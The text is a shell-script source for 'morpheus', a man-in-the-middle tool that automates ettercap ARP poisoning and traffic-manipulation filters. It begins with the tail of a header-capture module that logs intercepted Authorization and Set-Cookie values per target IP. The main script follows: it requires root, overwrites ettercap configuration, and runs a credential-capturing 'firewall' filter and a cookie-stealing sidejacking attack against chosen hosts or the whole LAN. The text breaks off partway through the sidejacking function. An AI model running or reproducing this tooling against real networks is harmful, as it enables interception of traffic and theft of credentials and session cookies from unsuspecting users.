rhost=`cat output/ip.mop | egrep -m 1 "target:" | cut -d ':' -f2`
iface=`netstat -r | grep "default" | awk {'print $8'}`
mod=`route -n | grep "UG" | awk {'print $2'} | tr -d '\n'`
#
# Use warning sounds in every capture?
# Special thanks: shanty damayanti (parrot OS)
#
echo "╔───────────────────────────────────────╗"
echo "| http tcp header information gathering |"
echo "╚───────────────────────────────────────╝"
echo -n "Be alerted by a BEEP in every <header> capture? (y/n):";read op
if [ $op = "y" ] || [ $op = "yes" ]; then
  OGG=`locate .ogg | grep "default/alerts" | head -3 | tail -1`
  warn=yes
else
  warn=no
fi



#
# Script banner
#
clear
echo "╔───────────────────────────────────────╗"
echo "| http tcp header information gathering |"
echo "╚───────────────────────────────────────╝"
echo " | Interface : $iface"
echo " |   Rhost   : $rhost"
echo " |_  Gateway : $mod"
echo ""


#
# Start of loop function ..
#
while :
do

  # check for logfile presence ..
  if [ -e logs/IG.log ]; then
    hour=`date | awk {'print $4,$5,$6'}`
    echo "" && echo "Tcp header capture"
    echo "Hour/Time: $hour"
    #
    # Play alert sound (paplay) settings ..
    #
    if [ $warn = "yes" ]; then
      if [ -e bin/warn.ogg ]; then
        paplay bin/warn.ogg
      else
        paplay $OGG
      fi
    fi


      #
      # Parsing captured data from IG.log file ..
      #
      TST=`cat logs/IG.log | egrep -m 1 "Tk:" | awk {'print $2'}` > /dev/nul 2>&1
      DNT=`cat logs/IG.log | egrep -m 1 "DNT:" | awk {'print $2'}` > /dev/nul 2>&1
      HST=`cat logs/IG.log | egrep -m 1 "Host:" | awk {'print $2'}` > /dev/nul 2>&1
      FEM=`cat logs/IG.log | egrep -m 1 "From:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1
      RFR=`cat logs/IG.log | egrep -m 1 "Referer:" | awk {'print $2,$3'}` > /dev/nul 2>&1
      SER=`cat logs/IG.log | egrep -m 1 "Server:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1
      FWR=`cat logs/IG.log | egrep -m 1 "Forwarded:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1
      XFO=`cat logs/IG.log | egrep -m 1 "X-Frame-Options:" | awk {'print $2'}` > /dev/nul 2>&1
      CON=`cat logs/IG.log | egrep -m 1 "Connection:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1
      CTT=`cat logs/IG.log | egrep -m 1 "Content-Type:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1
      AUT=`cat logs/IG.log | egrep -m 1 "Authorization:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1
      XSS=`cat logs/IG.log | egrep -m 1 "X-XSS-Protection:" | awk {'print $2,$3'}` > /dev/nul 2>&1
      XCO=`cat logs/IG.log | egrep -m 1 "X-Content-Type-Options:" | awk {'print $2'}` > /dev/nul 2>&1
      CHC=`cat logs/IG.log | egrep -m 1 "Cache-Control:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1
      XFH=`cat logs/IG.log | egrep -m 1 "X-Forwarded-Host:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1
      CEN=`cat logs/IG.log | egrep -m 1 "Content-Encoding:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1
      ACS=`cat logs/IG.log | egrep -m 1 "Accept-Charset:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1
      CTL=`cat logs/IG.log | egrep -m 1 "Content-Language:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1
      STC=`cat logs/IG.log | egrep -m 1 "Set-Cookie:" | awk {'print $2,$3,$4,$5,$6,$7'}` > /dev/nul 2>&1
      LGA=`cat logs/IG.log | egrep -m 1 "Accepted-Language:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1
      HSTS=`cat logs/IG.log | egrep -m 1 "Strict-Transport-Security:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1
      ACAM=`cat logs/IG.log | egrep -m 1 "Access-Control-Allow-Methods:" | awk {'print $2,$3,$4,$5,$6'}` > /dev/nul 2>&1
      TUA=`cat logs/IG.log | egrep -m 1 "User-Agent:" | awk {'print $2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14'}` > /dev/nul 2>&1


      #
      # Print OnScreen headers captured ..
      #
      sleep 0.8
      echo "------------------------------------------------"
      echo "Host                : $HST"
      echo "DNT(Do Not Track)   : $DNT"
      echo "Tk(track status)    : $TST"
      echo "Content-Language    : $CTL"
      echo "Accepted-Language   : $LGA"
      echo "Connection          : $CON"
      echo "Content-Encoding    : $CEN"
      echo "X-XSS-Protection    : $XSS"
      echo "From                : $FEM"
      echo "Server              : $SER"
      echo "Allow-Methods       : $ACAM"
      echo "Cache-Control       : $CHC"
      echo "X-Forwarded-Host    : $XFH"
      echo "X-Content-Type-Opt  : $XCO"
      echo "X-Frame-Options     : $XFO"
      echo "Accept-Charset      : $ACS"
      echo "Content-Type        : $CTT"
      echo "HSTS                : $HSTS"
      echo "Authorization       : $AUT"
      echo "Set-Cookie          : $STC"
      echo "Forwarded           : $FWR"
      echo "Referer             : $RFR"
      echo "User-Agent          : $TUA"
      echo "------------------------------------------------"
      echo "[HELP] HTTP Headers : https://mzl.la/2OWMOte"


      #
      # Build new logfile with ALL the diferent packets data captured
      # for later review ( ../morpheus/logs/192.168.1.71-header_capture.log ).
      #
      if [ -d logs ]; then
        echo "" >> logs/$rhost-header_capture.log
        echo "Tcp header capture" >> logs/$rhost-header_capture.log
        echo "Target ip: $rhost" >> logs/$rhost-header_capture.log
        echo "Hour/Time: $hour" >> logs/$rhost-header_capture.log
        echo "------------------------------------------------" >> logs/$rhost-header_capture.log
        echo "Host                : $HST" >> logs/$rhost-header_capture.log
        echo "DNT(Do Not Track)   : $DNT" >> logs/$rhost-header_capture.log
        echo "Tk(track status)    : $TST" >> logs/$rhost-header_capture.log
        echo "Content-Language    : $CTL" >> logs/$rhost-header_capture.log
        echo "Accepted-Language   : $LGA" >> logs/$rhost-header_capture.log
        echo "Connection          : $CON" >> logs/$rhost-header_capture.log
        echo "Content-Encoding    : $CEN" >> logs/$rhost-header_capture.log
        echo "X-XSS-Protection    : $XSS" >> logs/$rhost-header_capture.log
        echo "From                : $FEM" >> logs/$rhost-header_capture.log
        echo "Server              : $SER" >> logs/$rhost-header_capture.log
        echo "Allow-Methods       : $ACAM" >> logs/$rhost-header_capture.log
        echo "Cache-Control       : $CHC" >> logs/$rhost-header_capture.log
        echo "X-Forwarded-Host    : $XFH" >> logs/$rhost-header_capture.log
        echo "X-Content-Type-Opt  : $XCO" >> logs/$rhost-header_capture.log
        echo "X-Frame-Options     : $XFO" >> logs/$rhost-header_capture.log
        echo "Accept-Charset      : $ACS" >> logs/$rhost-header_capture.log
        echo "Content-Type        : $CTT" >> logs/$rhost-header_capture.log
        echo "HSTS                : $HSTS" >> logs/$rhost-header_capture.log
        echo "Authorization       : $AUT" >> logs/$rhost-header_capture.log
        echo "Set-Cookie          : $STC" >> logs/$rhost-header_capture.log
        echo "Forwarded           : $FWR" >> logs/$rhost-header_capture.log
        echo "Referer             : $RFR" >> logs/$rhost-header_capture.log
        echo "User-Agent          : $TUA" >> logs/$rhost-header_capture.log
        echo "------------------------------------------------" >> logs/$rhost-header_capture.log
        echo "[HELP] HTTP Headers : https://mzl.la/2OWMOte" >> logs/$rhost-header_capture.log
        echo "" >> logs/$rhost-header_capture.log
      else
        echo "[ERROR] ../morpheus/logs/$rhost-header_capture.log  [ NOT BUILD ]"
      fi


    echo ""
    # delete temp logfile
    rm -f logs/IG.log > /dev/nul 2>&1
    sleep 1.3
    fi


  # end loop
  done

# exit script
exit

#!/bin/sh
###
# morpheus - automated ettercap TCP/IP Hijacking tool
# Author: pedr0 Ubuntu [r00t-3xp10it] version: 2.3
# Suspicious-Shell-Activity (SSA) RedTeam develop @2018
# codename: oneiroi_phobetor [ GPL licensed ]
#
#
# DESCRIPTION:
# Morpheus it's a Man-In-The-Middle suite that allows users to manipulate tcp/udp
# data using ettercap, urlsnarf, msgsnarf and tcpkill as backend applications, but...
# This tool main objective it's not to provide an easy way to exploit/sniff targets
# but ratter a 'call for attention' to tcp/udp manipulation technics (etter filters).
# "I belive that the most funny step, it will be when you write your own filter and watch it run".
#
#
# DEPENDENCIES:
# required: ettercap, nmap, zenity, apache2
# sub-dependencies: driftnet, dsniff (urlsnarf, tcpkill, msgsnarf), sslstrip,dns2proxy
# Distros Supported: Linux Ubuntu, Kali, Debian, BackBox, Parrot OS
# Credits: alor&naga (ettercap framework)  | fyodor (nmap framework)| apache2 (Rob McCool) | dsniff (Dug Song)
# filters: irongeek (replace img) | seannicholls (rotate 180º) | TheBlaCkCoDeR09 (ToR-Browser-0day)
###


###
# Resize terminal windows size befor running the tool (gnome terminal)
# Special thanks to h4x0r Milton@Barra for this little piece of heaven! :D
resize -s 37 78 > /dev/null
# inicio




# -----------------------------------
# Colorise shell Script output leters
# -----------------------------------
Colors() {
Escape="\033";
  white="${Escape}[0m";
  RedF="${Escape}[31m";
  GreenF="${Escape}[32m";
  YellowF="${Escape}[33m";
  BlueF="${Escape}[34m";
  CyanF="${Escape}[36m";
Reset="${Escape}[0m";
}




# ---------------------
# Variable declarations
# ---------------------
dtr=`date | awk '{print $4}'`        # grab current hour
V3R="2.3"                            # module version number
cnm="oneiroi_phobetor"               # module codename
DiStR0=`awk '{print $1}' /etc/issue` # grab distribution -  Ubuntu or Kali
IPATH=`pwd`                          # grab morpheus.sh install path
GaTe=`ip route | grep "default" | awk {'print $3'}` > /dev/null 2>&1    # gateway
IP_RANGE=`ip route | grep "kernel" | awk {'print $1'}` > /dev/null 2>&1 # ip-range
PrompT=`cat $IPATH/settings | egrep -m 1 "PROMPT_DISPLAY" | cut -d '=' -f2` > /dev/null 2>&1
LoGs=`cat $IPATH/settings | egrep -m 1 "WRITE_LOGFILES" | cut -d '=' -f2` > /dev/null 2>&1
IpV=`cat $IPATH/settings | egrep -m 1 "USE_IPV6" | cut -d '=' -f2` > /dev/null 2>&1
Edns=`cat $IPATH/settings | egrep -m 1 "ETTER_DNS" | cut -d '=' -f2` > /dev/null 2>&1
Econ=`cat $IPATH/settings | egrep -m 1 "ETTER_CONF" | cut -d '=' -f2` > /dev/null 2>&1
ApachE=`cat $IPATH/settings | egrep -m 1 "AP_PATH" | cut -d '=' -f2` > /dev/null 2>&1
LoGmSf=`cat $IPATH/settings | egrep -m 1 "LOG_MSF" | cut -d '=' -f2` > /dev/null 2>&1
TcPkiL=`cat $IPATH/settings | egrep -m 1 "TCP_KILL" | cut -d '=' -f2` > /dev/null 2>&1
UsNar=`cat $IPATH/settings | egrep -m 1 "URL_SNARF" | cut -d '=' -f2` > /dev/null 2>&1
MsGnA=`cat $IPATH/settings | egrep -m 1 "MSG_SNARF" | cut -d '=' -f2` > /dev/null 2>&1
PrEfI=`cat $IPATH/settings | egrep -m 1 "PREFIX" | cut -d '=' -f2` > /dev/null 2>&1
DrIn=`cat $IPATH/settings | egrep -m 1 "DRI_NET" | cut -d '=' -f2` > /dev/null 2>&1
RbUdB=`cat $IPATH/settings | egrep -m 1 "REBUILD_DB" | cut -d '=' -f2` > /dev/null 2>&1
IPH_UA=`cat $IPATH/settings | egrep -m 1 "IPHONE_USERAGENT" | cut -d '=' -f2` > /dev/null 2>&1
LUA_PATH=`cat $IPATH/settings | egrep -m 1 "LIB_PATH" | cut -d '=' -f2` > /dev/null 2>&1




Colors;
cat << !

    ███╗   ███╗ ██████╗ ██████╗ ██████╗ ██╗  ██╗███████╗██╗   ██╗███████╗
    ████╗ ████║██╔═══██╗██╔══██╗██╔══██╗██║  ██║██╔════╝██║   ██║██╔════╝
    ██╔████╔██║██║   ██║██████╔╝██████╔╝███████║█████╗  ██║   ██║███████╗
    ██║╚██╔╝██║██║   ██║██╔══██╗██╔═══╝ ██╔══██║██╔══╝  ██║   ██║╚════██║
    ██║ ╚═╝ ██║╚██████╔╝██║  ██║██║     ██║  ██║███████╗╚██████╔╝███████║
    ╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝╚══════╝ ╚═════╝ ╚══════╝
!
echo -e "${RedF}    Morpheus${white}©::${RedF}v$V3R${white}::${RedF}codename${white}::${RedF}oneiroi_phobetor${white}::${RedF}SuspiciousShellActivity${white}©"
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    |${YellowF}Morpheus its a Man-In-The-Middle (mitm) suite that allows users to ${BlueF}|"
echo -e "${BlueF}    |${YellowF}manipulate tcp/udp data using ettercap, urlsnarf, msgsnarf, tcpkill${BlueF}|"
echo -e "${BlueF}    |${YellowF}as backend applications but... This tool main objective its not to ${BlueF}|"
echo -e "${BlueF}    |${YellowF}provide an easy way to exploit/sniff targets, but ratter a call of ${BlueF}|"
echo -e "${BlueF}    |${YellowF}attemption to tcp/udp manipulations technics (etter filters).      ${BlueF}|"
echo -e "${BlueF}    ╠───────────────────────────────────────────────────────────────────╝"
sleep 1
echo -e "${BlueF}    ╘ ${white}Press [${GreenF} ENTER ${white}] to continue${RedF}!"
read OP
# -----------------------------------------
# check if user is root
# and if dependencies are proper installed
# ----------------------------------------
if [ $(id -u) != "0" ]; then
echo -e ""
echo -e ${RedF}[☠]${white} we need to be root to run this script...${Reset};
echo -e ${RedF}[☠]${white} execute [ sudo ./morpheus.sh ] on terminal ${Reset};
exit
fi


apc=`which ettercap`
if [ "$?" != "0" ]; then
echo -e ""
echo -e ${RedF}[☠]${white} ettercap '->' not found! ${Reset};
sleep 1
echo -e ${RedF}[☠]${white} This script requires ettercap to work! ${Reset};
echo -e ${RedF}[☠]${white} Please run: sudo apt-get install ettercap ${Reset};
echo -e ${RedF}[☠]${white} to install missing dependencies... ${Reset};
exit
fi



npm=`which nmap`
if [ "$?" != "0" ]; then
echo -e ""
echo -e ${RedF}[☠]${white} nmap '->' not found! ${Reset};
sleep 1
echo -e ${RedF}[☠]${white} This script requires nmap to work! ${Reset};
echo -e ${RedF}[☠]${white} Please run: sudo apt-get install nmap ${Reset};
echo -e ${RedF}[☠]${white} to install missing dependencies... ${Reset};
exit
fi



npm=`which httpd`
if [ "$?" != "0" ]; then
echo -e ""
echo -e ${RedF}[☠]${white} apache2 '->' not found! ${Reset};
sleep 1
echo -e ${RedF}[☠]${white} This script requires apache2 to work! ${Reset};
echo -e ${RedF}[☠]${white} Please run: sudo apt-get install apache ${Reset};
echo -e ${RedF}[☠]${white} to install missing dependencies... ${Reset};
exit
fi





# ------------------------------------------
# pass arguments to script [ -h ]
# we can use: ./morpheus.sh -h for help menu
# ------------------------------------------
while getopts ":h" opt; do
  case $opt in
    h)
cat << !
---
-- Author: r00t-3xp10it | SSA RedTeam @2018
-- Supported: Linux Kali, Ubuntu, Mint, Parrot OS
-- Suspicious-Shell-Activity (SSA) RedTeam develop @2016
---

   morpheus.sh framework automates tcp/udp packet manipulation tasks by using
   ettercap filters to manipulate target http requests under MitM attacks
   replacing the http packet contents by our own contents befor sending the
   packet back to the host that have request for it (tcp/ip hijacking).

   morpheus ships with a collection of etter filters writen be me to acomplish
   various tasks: replacing images in webpages, replace text in webpages, inject
   payloads using html <form> tag, denial-of-service attack (drop packets from source)
   https/ssh downgrade attacks, redirect target browser traffic to another ip address
   and also gives you the ability to build/compile your filter from scratch and lunch
   it through morpheus framework.

!
   exit
    ;;
    \?)
      echo -e ${RedF}[x]${white} Invalid option:${RedF} -$OPTARG ${Reset}; >&2
      exit
    ;;
  esac
done




# ---------------------------------------------
# grab Operative System distro to store IP addr
# output = Ubuntu OR Kali OR Parrot OR BackBox
# ---------------------------------------------
InT3R=`netstat -r | grep "default" | awk {'print $8'}` # grab interface in use
case $DiStR0 in
    Kali) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
    Debian) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
    Mint) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}' | cut -d ':' -f2`;;
    Ubuntu) IP=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'} | cut -d ':' -f2`;;
    Parrot) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
    BackBox) IP=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'} | cut -d ':' -f2`;;
    elementary) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
    *) IP=`zenity --title="☠ Input your IP addr ☠" --text "example: 192.168.1.68" --entry --width 270`;;
esac


# config internal framework settings
ping -c 3 www.google.com | zenity --progress --pulsate --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text="Config internal framework settings...\nip addr, ip range, gateway, interface\netter.conf, etter.dns, uid/gid privileges." --percentage=0 --auto-close --width 290 > /dev/null 2>&1
if [ -e $Econ ]; then
  cp $Econ /tmp/etter.conf > /dev/null 2>&1
  cp $IPATH/bin/etter.conf $Econ > /dev/null 2>&1
  sleep 1
else
  echo -e ${RedF}[x]${white} morpheus cant Find:${RedF} $Econ ${Reset};
  echo -e ${RedF}[x]${white} edit settings File to input path of etter.conf File ${Reset};
  sleep 2
  exit
fi


# ----------------------------------
# bash trap ctrl-c and call ctrl_c()
# ----------------------------------
trap ctrl_c INT
ctrl_c() {
echo -e "${RedF}[x]${white} CTRL+C Abort current tasks${RedF}...${Reset}"
# clean logfiles folder at exit
rm $IPATH/logs/parse > /dev/null 2>&1
rm $IPATH/logs/lan.mop > /dev/null 2>&1
rm $IPATH/logs/triggertwo > /dev/nul 2>&1
rm $IPATH/output/firewall.ef > /dev/null 2>&1
rm $IPATH/output/template.ef > /dev/null 2>&1
rm $IPATH/output/redirect.ef > /dev/null 2>&1
rm $IPATH/output/EasterEgg.ef > /dev/null 2>&1
rm $IPATH/output/UserAgent.ef > /dev/null 2>&1
rm $IPATH/output/grab_hosts.ef > /dev/null 2>&1
rm $IPATH/output/packet_drop.ef > /dev/null 2>&1
rm $IPATH/output/img_replace.ef > /dev/null 2>&1
rm $IPATH/output/sidejacking.ef > /dev/null 2>&1
rm $IPATH/output/chat_services.ef > /dev/null 2>&1
rm $IPATH/output/dhcp-discovery.ef > /dev/null 2>&1
rm $IPATH/output/cryptocurrency.ef > /dev/null 2>&1
# revert filters to default stage
mv $IPATH/filters/firewall.rb $IPATH/filters/firewall.eft > /dev/null 2>&1
mv $IPATH/filters/template.rb $IPATH/filters/template.eft > /dev/null 2>&1
mv $IPATH/filters/redirect.rb $IPATH/filters/redirect.eft > /dev/null 2>&1
mv $IPATH/filters/EasterEgg.rb $IPATH/filters/EasterEgg.eft > /dev/null 2>&1
mv $IPATH/filters/UserAgent.rb $IPATH/filters/UserAgent.eft > /dev/null 2>&1
mv $IPATH/filters/grab_hosts.rb $IPATH/filters/grab_hosts.eft > /dev/null 2>&1
mv $IPATH/filters/packet_drop.rb $IPATH/filters/packet_drop.eft > /dev/null 2>&1
mv $IPATH/filters/img_replace.rb $IPATH/filters/img_replace.eft > /dev/null 2>&1
mv $IPATH/filters/sidejacking.rb $IPATH/filters/sidejacking.eft > /dev/null 2>&1
mv $IPATH/filters/chat_services.rb $IPATH/filters/chat_services.eft > /dev/null 2>&1
mv $IPATH/filters/cryptocurrency.rb $IPATH/filters/cryptocurrency.eft > /dev/null 2>&1
mv $IPATH/filters/dhcp-discovery.bak $IPATH/filters/dhcp-discovery.eft > /dev/null 2>&1
mv $IPATH/bin/phishing/EasterEgg.bak $IPATH/bin/phishing/EasterEgg.html > /dev/null 2>&1
rm -r $IPATH/logs/capture > /dev/null 2>&1
rm $ApachE/index.html > /dev/null 2>&1
rm $ApachE/cssbanner.js > /dev/null 2>&1
rm -R $ApachE/"Google Sphere_files" > /dev/null 2>&1
mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
# revert ettercap conf files to default stage
if [ -e $Edns ]; then
mv /tmp/etter.dns $Edns > /dev/null 2>&1
echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Revert ettercap etter.dns ${Reset};
fi
if [ -e $Econ ]; then
echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Revert ettercap etter.conf ${Reset};
mv /tmp/etter.conf $Econ > /dev/null 2>&1
fi
sleep 2
exit
}




#
#
# START OF SCRIPT FUNTIONS
#
#
# ----------------------------------------
# PRE-CONFIGURATED TEMPLATE - FIREWALL.EFT
# ----------------------------------------
sh_stage1 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}This module acts like a firewall report/block/capture_credentials ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}    from the selected targets tcp/udp connections (local lan)     ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1

  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  cp $IPATH/filters/firewall.eft $IPATH/filters/firewall.rb > /dev/null 2>&1
  sleep 1

  echo -e ${BlueF}[☠]${white} Edit firewall.eft${RedF}!${Reset};
  sleep 1
fil_one=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose first target to filter through morpheus." --entry --width 270) > /dev/null 2>&1
fil_two=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose last target to filter through morpheus.\nchose gateway ip, if you dont have any more targets." --entry --width 270) > /dev/null 2>&1


  cd $IPATH/filters
  ed=`hostname`
  echo -e "$ed"7 > /tmp/test
  hOstNaMe=`cat /tmp/test`
  dIsd=`uname -r`
  # replace values in template.filter with sed bash command
  sed -i "s|TaRONE|$fil_one|g" firewall.eft # NO dev/null to report file not existence :D
  sed -i "s|TaRTWO|$fil_two|g" firewall.eft > /dev/null 2>&1
  sed -i "s|hOst|$hOstNaMe|g" firewall.eft > /dev/null 2>&1
  sed -i "s|MoDeM|$GaTe|g" firewall.eft > /dev/null 2>&1
  sed -i "s|DisTr|$dIsd|g" firewall.eft > /dev/null 2>&1
  rm /tmp/test > /dev/null 2>&1
  cd $IPATH
  zenity --info --title="☠ MORPHEUS SCRIPTING CONSOLE ☠" --text "morpheus framework now gives you\nthe oportunity to just run the filter\nOR to scripting it further...\n\n'Have fun scripting it further'..." --width 270 > /dev/null 2>&1
  xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/firewall.eft"
  sleep 1

    # compiling firewall.eft to be used in ettercap
    echo -e ${BlueF}[☠]${white} Compiling firewall.eft${RedF}!${Reset};
    xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/firewall.eft -o $IPATH/output/firewall.ef && sleep 3"
    sleep 1
    # port-forward
    # echo -e "1" > /proc/sys/net/ipv4/ip_forward
    cd $IPATH/logs

      # run mitm+filter
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/firewall.ef -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/firewall.ef -L $IPATH/logs/firewall -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/firewall.ef -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/firewall.ef -L $IPATH/logs/firewall -M ARP /$rhost/ /$gateway/
        fi
      fi

  # check if exist any reports
  dd=`ls $IPATH/logs`
  if ! [ -z "$dd" ]; then
  Qu=$(zenity --info --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "logfiles stored $IPATH/logs" --width 270) > /dev/null 2>&1
  fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $IPATH/filters/firewall.rb $IPATH/filters/firewall.eft > /dev/null 2>&1
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2
  rm $IPATH/output/firewall.ef > /dev/null 2>&1
  cd $IPATH

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# -------------------------------------------
# SIDEJACKING ATTACK (HTTP) STEAL COOKIES
# -------------------------------------------
sh_stage2 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}    This module will display port 80(http) and port 443(https)    ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  traffic from selected target host, And it will warn attacker    ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} If any auth cookie its captured And stored in 'sidejacking.log'  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  'Also this module allow users to input a cookie name to filter' ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
rm $IPATH/logs/sidejacking.log > /dev/null 2>&1
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1


  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  cp $IPATH/filters/sidejacking.eft $IPATH/filters/sidejacking.rb > /dev/null 2>&1
  sleep 1

  echo -e ${BlueF}[☠]${white} Edit sidejacking.eft${RedF}!${Reset};
  sleep 1
  fil_one=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nChose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1
  FiLteR=$(zenity --title="☠ Enter COOKIE NAME ☠" --text "example:userid=\nIf you want to capture all cookies use:Cookie\nInput a cookie name to filter through morpheus." --entry --width 270) > /dev/null 2>&1
  # replace values in template.filter with sed bash command
  cd $IPATH/filters
  sed -i "s|TaRgEt|$fil_one|g" sidejacking.eft # NO dev/null to report file not existence :D
  sed -i "s|UsErInPut|$FiLteR|g" sidejacking.eft > /dev/null 2>&1
  cd $IPATH
  zenity --info --title="☠ MORPHEUS SCRIPTING CONSOLE ☠" --text "morpheus framework now gives you\nthe oportunity to just run the filter\nOR to scripting it further...\n\n'Have fun scripting it further'..." --width 270 > /dev/null 2>&1
  xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/sidejacking.eft"
  sleep 1

    # compiling packet_drop.eft to be used in ettercap
    echo -e ${BlueF}[☠]${white} Compiling sidejacking.eft${RedF}!${Reset};
    xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/sidejacking.eft -o $IPATH/output/sidejacking.ef && sleep 3"
    sleep 1
    # port-forward
    # echo -e "1" > /proc/sys/net/ipv4/ip_forward
    cd $IPATH/logs

      # run mitm+filter
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T --visual text -Q -i $InT3R -F $IPATH/output/sidejacking.ef -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T --visual text -Q -i $InT3R -F $IPATH/output/sidejacking.ef -L $IPATH/logs/sidejacking -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T --visual text -Q -i $InT3R -F $IPATH/output/sidejacking.ef -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T --visual text -Q -i $InT3R -F $IPATH/output/sidejacking.ef -L $IPATH/logs/sidejacking -M ARP /$rhost/ /$gateway/
        fi
      fi


  cd $IPATH/logs
  # delete utf-8/non-ancii caracters from tcp data captured
  tr -cd '\11\12\15\40-\176' < sidejacking.log > clean-file.log
  mv clean-file.log sidejacking.log > /dev/null 2>&1
  # store captured data (cookies) into one variable
